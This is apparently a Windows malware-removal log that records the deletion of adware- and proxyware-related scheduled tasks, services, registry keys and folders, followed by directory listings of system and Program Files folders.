HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{637E2C13-5027-47A7-9107-E3324F1213E8} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{637E2C13-5027-47A7-9107-E3324F1213E8} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{687ECE0D-CF66-42BC-9951-3C12D3BC5EC2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{687ECE0D-CF66-42BC-9951-3C12D3BC5EC2} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6E832262-BAD8-40D2-8D28-EE2E7D2E5622} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6E832262-BAD8-40D2-8D28-EE2E7D2E5622} => key removed successfully
C:\WINDOWS\System32\Tasks\{E6D23253-1BC6-4DC7-972F-F9F2F5596439} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{E6D23253-1BC6-4DC7-972F-F9F2F5596439} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{70412D1E-3AB2-41BF-A076-334CC2DCD958} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{70412D1E-3AB2-41BF-A076-334CC2DCD958} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7D21B362-DCCB-4E9F-98C3-A48D802EB6A5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D21B362-DCCB-4E9F-98C3-A48D802EB6A5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7FB0B89D-2E9D-4C77-B67D-BF6202830584} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7FB0B89D-2E9D-4C77-B67D-BF6202830584} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo\Lenovo Service Bridge\S-1-5-21-732140370-2414468103-320680840-1003 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8232A377-31D7-44A1-BEBD-5D432EB975C9} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8232A377-31D7-44A1-BEBD-5D432EB975C9} => key removed successfully
C:\WINDOWS\System32\Tasks\KuaiZip_Update => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\KuaiZip_Update => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8960C2FC-FDF0-434A-A0B0-120144BAF5AD} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8960C2FC-FDF0-434A-A0B0-120144BAF5AD} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{97DC44DE-44A4-4F58-BFBF-538BBA4C7AC4} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{97DC44DE-44A4-4F58-BFBF-538BBA4C7AC4} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 3 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange v209 - 3 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ABA63C90-4A6A-46DA-B08D-30E3737A795A} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ABA63C90-4A6A-46DA-B08D-30E3737A795A} => key removed successfully
C:\WINDOWS\System32\Tasks\PC SpeedUp Service Deactivator => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PC SpeedUp Service Deactivator => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B48554ED-C19D-44C8-B156-0560568E355A} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B48554ED-C19D-44C8-B156-0560568E355A} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application v209 Guard => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v209 Guard => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{B88028EE-3EF2-4580-87C4-6C9F1C9D131C} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B88028EE-3EF2-4580-87C4-6C9F1C9D131C} => key removed successfully
C:\WINDOWS\System32\Tasks\UCBrowserSecureUpdater => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\UCBrowserSecureUpdater => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C37E0EB4-7A29-41AF-A618-EE8EADD5C406} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C37E0EB4-7A29-41AF-A618-EE8EADD5C406} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 2 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange v2 - 2 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C94C4D52-6DEC-4FAE-B24D-C774982AB815} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C94C4D52-6DEC-4FAE-B24D-C774982AB815} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 2 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange v209 - 2 => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{CC885471-1F4C-4BF4-84B7-2D7DFC153F9D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CC885471-1F4C-4BF4-84B7-2D7DFC153F9D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D57279A9-985E-41AB-A6B9-C663392DA97D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D57279A9-985E-41AB-A6B9-C663392DA97D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DD5F2E28-31C3-48D2-B3B1-9E15CA95A440} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DD5F2E28-31C3-48D2-B3B1-9E15CA95A440} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EBA869B9-6C89-4659-BF10-1BC8EB3D6070} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EBA869B9-6C89-4659-BF10-1BC8EB3D6070} => key removed successfully
C:\WINDOWS\System32\Tasks\Online Application v2 Guardian => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Online Application v2 Guardian => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EF2A4DCC-19C7-4CB0-98B5-467A61F967BC} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EF2A4DCC-19C7-4CB0-98B5-467A61F967BC} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FDA13CB3-67CD-49A6-A582-88C1957EE1BD} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FDA13CB3-67CD-49A6-A582-88C1957EE1BD} => key removed successfully
C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 3 => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Traffic Exchange v2 - 3 => key removed successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => moved successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA1cfee32ff15bdf1.job => moved successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-732140370-2414468103-320680840-1003Core.job => moved successfully
C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-732140370-2414468103-320680840-1003UA.job => moved successfully
C:\WINDOWS\Tasks\Online Application Updater.job => moved successfully
C:\WINDOWS\Tasks\Online Application v2 Guard.job => moved successfully
C:\WINDOWS\Tasks\Online Application v2 Guardian.job => moved successfully
C:\WINDOWS\Tasks\Online Application v2.job => moved successfully
C:\WINDOWS\Tasks\Online Application v209 Guard.job => moved successfully
C:\WINDOWS\Tasks\Online Application v209 Guardian.job => moved successfully
C:\WINDOWS\Tasks\Online Application v209.job => moved successfully
C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job => moved successfully
C:\WINDOWS\Tasks\Traffic Exchange Updater.job => moved successfully
C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job => moved successfully
C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job => moved successfully
C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job => moved successfully
C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job => moved successfully
C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job => moved successfully
C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job => moved successfully
C:\WINDOWS\Tasks\UCBrowserUpdater.job => moved successfully
C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job => moved successfully
WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION => removed successfully
C:\Users\Y\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => Shortcut argument removed successfully.
C:\Users\Y\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Shortcut argument removed successfully.
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk => Shortcut argument removed successfully.
C:\WINDOWS\system32\drivers => ":ucdrv-x64.sys" ADS removed successfully.
C:\WINDOWS\system32\drivers => ":x64" ADS removed successfully.
C:\WINDOWS\system32\drivers => ":x86" ADS removed successfully.
C:\ProgramData\Reprise => ":wupeogjxlctlfudivq`qsp`28hfm" ADS removed successfully.
C:\ProgramData\Reprise => ":wupeogjxldtlfudivq`qsp`26hfm" ADS removed successfully.
C:\ProgramData\Reprise => ":wupeogjxldtlfudivq`qsp`27hfm" ADS removed successfully.
C:\ProgramData\Temp => ":296515B3" ADS removed successfully.
C:\ProgramData\Temp => ":4FC01C57" ADS removed successfully.
C:\ProgramData\Temp => ":78F63A0E" ADS removed successfully.
C:\ProgramData\Temp => ":DC9AE426" ADS removed successfully.
C:\ProgramData\Temp => ":EC14014D" ADS removed successfully.
HKU\S-1-5-21-732140370-2414468103-320680840-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\ => value removed successfully
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\vr93xp24 => key removed successfully
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order vr93xp24 => removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj => key removed successfully
HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => key not found.
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk => moved successfully
HKLM\System\CurrentControlSet\Services\ibtsiva => key removed successfully
ibtsiva => service removed successfully
HKLM\System\CurrentControlSet\Services\UCBrowserSvc => key removed successfully
UCBrowserSvc => service removed successfully
ucdrv => Unable to stop service.
HKLM\System\CurrentControlSet\Services\ucdrv => key removed successfully
ucdrv => service removed successfully
HKLM\System\CurrentControlSet\Services\dbx => key removed successfully
dbx => service removed successfully
HKLM\System\CurrentControlSet\Services\idsvc => key removed successfully
idsvc => service removed successfully
HKLM\System\CurrentControlSet\Services\KuaiZipDrive => key removed successfully
KuaiZipDrive => service removed successfully
C:\Users\Y\AppData\Roaming\Bajipyhcch => moved successfully
C:\Users\Y\AppData\Local\Vilsyghewok => moved successfully
"C:\WINDOWS\System32\Tasks\Narech Client" => not found.
C:\ProgramData\Microleaves => moved successfully

"C:\Program Files (x86)\UCBrowser" folder move:

Could not move "C:\Program Files (x86)\UCBrowser" => Scheduled to move on reboot.

C:\Users\Y\AppData\Roaming\Fevitionpltige => moved successfully
C:\Program Files (x86)\Saaleruherty Core => moved successfully
C:\WINDOWS\System32\Tasks\Saaleruherty Core => moved successfully
"C:\WINDOWS\System32\Tasks\Leputy" => not found.
"C:\WINDOWS\System32\Tasks\UCBrowserSecureUpdater" => not found.
C:\WINDOWS\System32\Tasks\UCBrowserUpdater => moved successfully
C:\WINDOWS\System32\Tasks\UCBrowserUpdaterCore => moved successfully
"C:\WINDOWS\Tasks\UCBrowserUpdater.job" => not found.
"C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job" => not found.
C:\Users\Y\AppData\Local\UCBrowser => moved successfully
C:\Users\Y\AppData\Local\Dieshfergerent => moved successfully
C:\Program Files (x86)\Figasy => moved successfully
C:\Users\Y\AppData\Local\svchost => moved successfully
C:\Users\Y\AppData\Roaming\UCChannel => moved successfully
"C:\WINDOWS\System32\Tasks\KuaiZip_Update" => not found.
C:\Users\Y\AppData\Roaming\Microsoft\Windows\Start Menu\żěŃą.lnk => moved successfully
C:\Users\Y\AppData\Roaming\Softlink => moved successfully
C:\Users\Y\AppData\Roaming\KuaiZip => moved successfully
"C:\WINDOWS\Tasks\Online Application Updater.job" => not found.
"C:\WINDOWS\Tasks\Traffic Exchange Updater.job" => not found.
"C:\WINDOWS\Tasks\PC SpeedUp Service Deactivator.job" => not found.
"C:\WINDOWS\Tasks\Online Application v209.job" => not found.
"C:\WINDOWS\Tasks\Online Application v209 Guardian.job" => not found.
"C:\WINDOWS\Tasks\Online Application v209 Guard.job" => not found.
"C:\WINDOWS\Tasks\Traffic Exchange v209 - 3.job" => not found.
"C:\WINDOWS\Tasks\Traffic Exchange v209 - 2.job" => not found.
"C:\WINDOWS\Tasks\Traffic Exchange v209 - 1.job" => not found.
"C:\WINDOWS\Tasks\Online Application v2.job" => not found.
"C:\WINDOWS\Tasks\Online Application v2 Guardian.job" => not found.
"C:\WINDOWS\Tasks\Online Application v2 Guard.job" => not found.
"C:\WINDOWS\Tasks\Traffic Exchange v2 - 3.job" => not found.
"C:\WINDOWS\Tasks\Traffic Exchange v2 - 2.job" => not found.
"C:\WINDOWS\Tasks\Traffic Exchange v2 - 1.job" => not found.
"C:\WINDOWS\System32\Tasks\Online Application Guardian" => not found.
"C:\WINDOWS\System32\Tasks\Online Application Guard" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange Guardian" => not found.
"C:\WINDOWS\System32\Tasks\Online Application" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange Guard" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange" => not found.
"C:\WINDOWS\System32\Tasks\Online Application Updater" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange Updater" => not found.
"C:\WINDOWS\System32\Tasks\Online Application v209 Guardian" => not found.
"C:\WINDOWS\System32\Tasks\Online Application v209 Guard" => not found.
"C:\WINDOWS\System32\Tasks\Online Application v2 Guardian" => not found.
"C:\WINDOWS\System32\Tasks\Online Application v209" => not found.
"C:\WINDOWS\System32\Tasks\Online Application v2 Guard" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 3" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 2" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange v209 - 1" => not found.
"C:\WINDOWS\System32\Tasks\Online Application v2" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 3" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 2" => not found.
"C:\WINDOWS\System32\Tasks\Traffic Exchange v2 - 1" => not found.
"C:\WINDOWS\System32\Tasks\PC SpeedUp Service Deactivator" => not found.
"C:\Users\Y\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" => not found.
C:\Program Files (x86)\Microleaves => moved successfully
C:\Users\Y\AppData\Roaming\Microleaves => moved successfully
C:\Users\Default\AppData\Local\AdvinstAnalytics => moved successfully
"C:\Users\Default User\AppData\Local\AdvinstAnalytics" => not found.

========= dir "C:\Windows\Inf" /AD =========

Volume in drive C is Windows7_OS
Volume Serial Number is 2A5A-65CD

Directory of C:\Windows\Inf

17.03.2017 10:33 <DIR> .
17.03.2017 10:33 <DIR> ..
03.08.2016 06:16 <DIR> .NET CLR Data
03.08.2016 06:16 <DIR> .NET CLR Networking
02.08.2016 20:30 <DIR> .NET CLR Networking 4.0.0.0
03.08.2016 06:16 <DIR> .NET Data Provider for Oracle
03.08.2016 06:16 <DIR> .NET Data Provider for SqlServer
02.08.2016 20:30 <DIR> .NET Memory Cache 4.0
03.08.2016 06:16 <DIR> .NETFramework
02.08.2016 20:30 <DIR> ASP.NET
03.08.2016 06:16 <DIR> ASP.NET State
02.08.2016 20:27 <DIR> ASP.NET_2.0.50727
02.08.2016 20:30 <DIR> ASP.NET_4.0.30319
02.08.2016 20:28 <DIR> ASP.NET_64_2.0.50727
02.08.2016 20:30 <DIR> aspnet_state
16.07.2016 15:14 <DIR> BITS
16.07.2016 15:14 <DIR> en-US
16.07.2016 15:14 <DIR> ESENT
16.07.2016 15:14 <DIR> MSDTC
03.08.2016 06:16 <DIR> MSDTC Bridge 3.0.0.0
02.08.2016 20:30 <DIR> MSDTC Bridge 4.0.0.0
02.08.2016 20:30 <DIR> Outlook
16.07.2016 15:14 <DIR> PERFLIB
02.08.2016 20:30 <DIR> PNRPSvc
16.07.2016 15:14 <DIR> rdyboost
16.07.2016 15:14 <DIR> RemoteAccess
03.08.2016 06:16 <DIR> ServiceModelEndpoint 3.0.0.0
03.08.2016 06:16 <DIR> ServiceModelOperation 3.0.0.0
03.08.2016 06:16 <DIR> ServiceModelService 3.0.0.0
03.08.2016 06:16 <DIR> SMSvcHost 3.0.0.0
02.08.2016 20:30 <DIR> SMSvcHost 4.0.0.0
16.07.2016 15:14 <DIR> TAPISRV
16.07.2016 15:14 <DIR> TermService
16.07.2016 15:14 <DIR> UGatherer
16.07.2016 15:14 <DIR> UGTHRSVC
02.08.2016 20:30 <DIR> usbhub
03.08.2016 06:16 <DIR> W3SVC
03.08.2016 06:16 <DIR> Windows Workflow Foundation 3.0.0.0
02.08.2016 20:30 <DIR> Windows Workflow Foundation 4.0.0.0
17.03.2017 14:51 <DIR> WmiApRpl
16.07.2016 15:14 <DIR> wsearchidxpi
0 File(s) 0 bytes
41 Dir(s) 8˙421˙687˙296 bytes free

========= End of CMD: =========

========= dir "C:\PROGRA~1" =========

Volume in drive C is Windows7_OS
Volume Serial Number is 2A5A-65CD

Directory of C:\PROGRA~1

17.03.2017 14:56 <DIR> .
17.03.2017 14:56 <DIR> ..
30.03.2006 15:57 46˙592 04-10v1r0 - Z znam o provedenˇ vstupnˇ l‚kaýsk‚ prohlˇdky.wpd
06.11.2005 12:38 23˙552 04-12v1r0 - Zaçkolovacˇ pl n.wpd
30.06.2016 20:56 <DIR> 3Dconnexion
28.02.2017 19:08 <DIR> Affinity
15.04.2015 00:04 <DIR> Artlantis Studio 6
24.06.2016 01:14 <DIR> Autodesk
21.06.2014 08:02 <DIR> Blender Foundation
08.03.2017 08:48 <DIR> Bonjour
25.12.2015 12:51 <DIR> CCleaner
03.08.2016 06:19 <DIR> CMAK
25.11.2016 10:16 <DIR> CodeMeter
12.03.2017 14:34 <DIR> Common Files
19.05.2016 22:14 <DIR> CPUID
02.09.2015 10:28 <DIR> DesignCAD 3D MAX 25 64-bit
17.04.2015 21:28 <DIR> DesignCAD 3D Max Plus
01.12.2015 10:41 <DIR> DIFX
02.08.2016 20:36 <DIR> DisplayLink Core Software
06.12.2015 20:24 <DIR> dm
23.05.2016 11:19 <DIR> Dolby Digital Plus
12.08.2015 19:42 <DIR> DVD Maker
11.12.2014 15:46 <DIR> EaseUS
10.02.2016 19:42 <DIR> Epic Games
04.12.2014 08:33 <DIR> ESET
18.12.2014 14:22 <DIR> Futuremark
01.12.2014 09:56 <DIR> GIMP 2
25.11.2016 13:00 <DIR> GRAPHISOFT
12.12.2014 16:03 <DIR> Handbrake
19.05.2016 22:13 <DIR> HWiNFO64
25.08.2016 02:13 <DIR> IMSIDesign
23.03.2015 17:57 <DIR> Inkscape
06.01.2017 14:55 <DIR> Intel
12.08.2015 19:42 <DIR> Intel Corporation
17.03.2017 04:25 <DIR> Internet Explorer
08.03.2017 08:50 <DIR> iPod
08.03.2017 08:50 <DIR> iTunes
02.06.2016 07:51 <DIR> Krita (x64)
25.09.2016 22:06 <DIR> Lenovo
22.06.2014 09:26 <DIR> Logitech
14.03.2017 23:24 <DIR> Microsoft Office
14.12.2016 17:25 <DIR> Microsoft Office 15
14.07.2014 09:24 <DIR> Microsoft Research
17.03.2017 09:12 <DIR> Microsoft Silverlight
22.12.2015 11:48 <DIR> Microvirt
09.12.2013 19:35 <DIR> MLPS
03.08.2016 06:16 <DIR> MSBuild
28.07.2014 17:49 <DIR> Next Limit
29.11.2016 14:02 <DIR> Nikon
08.11.2016 23:27 <DIR> NVIDIA Corporation
16.10.2015 15:46 <DIR> OBS
01.03.2016 18:51 <DIR> PDF Architect 4
17.03.2017 09:24 <DIR> PDFCreator
18.05.2016 20:15 <DIR> RawTherapee-4.2.450
02.08.2016 20:27 <DIR> Realtek
22.10.2016 14:29 <DIR> Recuva
03.08.2016 06:16 <DIR> Reference Assemblies
19.10.2015 23:46 <DIR> Samsung
20.06.2016 06:50 <DIR> Sandboxie
11.06.2015 13:14 <DIR> SIGMA
09.12.2016 00:20 <DIR> SketchUp
02.08.2016 20:26 <DIR> Synaptics
05.02.2017 12:48 <DIR> TC UP
22.12.2016 09:26 <DIR> ThinkPad
17.03.2017 15:05 <DIR> trend micro
05.06.2014 12:46 <DIR> WIBU-SYSTEMS
17.03.2017 04:25 <DIR> Windows Defender
30.09.2016 16:44 <DIR> Windows Defender Advanced Threat Protection
17.03.2017 04:25 <DIR> Windows Mail
01.11.2016 13:49 <DIR> Windows Media Player
16.07.2016 12:47 <DIR> Windows Multimedia Platform
16.07.2016 12:47 <DIR> Windows NT
17.03.2017 04:25 <DIR> Windows Photo Viewer
16.07.2016 12:47 <DIR> Windows Portable Devices
16.07.2016 12:47 <DIR> WindowsPowerShell
13.04.2016 14:02 <DIR> WinHTTrack
14.04.2015 11:10 <DIR> WinRAR
06.12.2015 19:51 <DIR> Zoner
06.04.2016 20:03 <DIR> ZWCAD Viewer
2 File(s) 70˙144 bytes
77 Dir(s) 8˙421˙679˙104 bytes free

========= End of CMD: =========

========= dir "C:\PROGRA~2" =========

Volume in drive C is Windows7_OS
Volume Serial Number is 2A5A-65CD

Directory of C:\PROGRA~2

17.03.2017 16:55 <DIR> .
17.03.2017 16:55 <DIR> ..
07.02.2017 13:59 <DIR> 3Dconnexion
26.05.2016 23:07 <DIR> ABBYY FineReader 12
22.06.2015 07:34 <DIR> Actual Window Manager
05.06.2014 22:13 <DIR> Adobe
10.12.2015 14:36 <DIR> AlcorMicro
10.12.2015 14:36 <DIR> AlcorMicroData
03.02.2016 22:24 <DIR> AOMEI Backupper
06.04.2016 07:53 <DIR> Apple Software Update
04.05.2016 06:32 <DIR> Autodesk
22.08.2015 20:38 <DIR> AVerMedia
21.11.2015 12:43 <DIR> BIMobject
04.05.2016 09:59 <DIR> BIMTECH
23.12.2016 00:22 <DIR> BinarySense
08.03.2017 08:48 <DIR> Bonjour
28.06.2015 19:51 <DIR> Cadimage Installer
21.10.2015 00:48 <DIR> ClockworkMod
03.08.2016 06:19 <DIR> CMAK
25.11.2016 10:16 <DIR> CodeMeter
03.03.2017 12:52 <DIR> Common Files
09.12.2013 20:13 <DIR> CyberLink
25.08.2016 02:11 <DIR> DesignCAD 3D Max 2016 x64 Setup Files
05.06.2014 12:05 <DIR> DesignCAD 3D Max 23.0
23.09.2014 20:58 <DIR> DesignCAD 3D Max 24.0
30.07.2015 09:36 <DIR> DesignCAD 3D MAX 25 64-bit
07.11.2015 17:20 <DIR> Digiarty
08.03.2017 23:41 <DIR> Dropbox
12.12.2014 22:40 <DIR> EaseUS
29.03.2016 11:00 <DIR> FinalWire
17.04.2015 20:55 <DIR> Free Font Renamer
18.12.2014 14:38 <DIR> Futuremark
10.02.2017 13:38 <DIR> Google
08.09.2016 10:53 <DIR> GRAPHISOFT
03.11.2014 19:19 <DIR> gs
23.12.2016 00:16 <DIR> HD Tune Pro
01.10.2015 06:45 <DIR> IMSIDesign
09.12.2013 19:43 <DIR> Integrated Camera
06.01.2017 14:56 <DIR> Intel
17.03.2017 04:25 <DIR> Internet Explorer
08.09.2016 10:53 <DIR> Java
03.02.2015 14:08 <DIR> KeePass Password Safe 2
16.07.2014 16:44 <DIR> KONICA MINOLTA
07.11.2016 14:20 <DIR> KROSplus
05.02.2017 11:10 <DIR> Lenovo
02.09.2015 11:00 <DIR> Lenovo Registration
22.06.2014 09:26 <DIR> Logitech
03.01.2017 14:47 <DIR> ManicTime
17.03.2017 09:12 <DIR> Microsoft Silverlight
14.12.2016 17:53 <DIR> Microsoft.NET
14.12.2016 16:29 <DIR> MSBuild
13.02.2015 16:25 <DIR> MSXML 4.0
29.11.2016 14:02 <DIR> Nikon
01.12.2015 10:41 <DIR> Nokia
23.08.2015 02:45 <DIR> NVIDIA Corporation
05.06.2014 11:09 <DIR> O2Micro
16.10.2015 15:46 <DIR> OBS
23.09.2014 08:20 <DIR> OpenOffice 4
05.12.2016 15:06 <DIR> Opera developer
10.03.2017 15:45 <DIR> Origin
10.03.2017 15:58 <DIR> Origin Games
01.12.2015 10:41 <DIR> PC Connectivity Solution
06.10.2015 00:36 <DIR> PDF Architect 2
01.03.2016 18:51 <DIR> PDF Architect 4
03.11.2014 19:21 <DIR> PlotSoft
07.06.2014 17:05 <DIR> PowerMenu
09.12.2013 19:56 <DIR> Realtek
03.08.2016 06:16 <DIR> Reference Assemblies
11.12.2014 15:29 <DIR> Rene.E Laboratory
28.06.2016 18:09 <DIR> Samsung
12.09.2015 23:19 <DIR> SecondLifeViewer
07.06.2014 19:48 <DIR> SIGMA
05.06.2014 12:36 <DIR> SketchUp
03.03.2017 12:52 <DIR> Skype
25.07.2016 09:49 <DIR> SmartSense
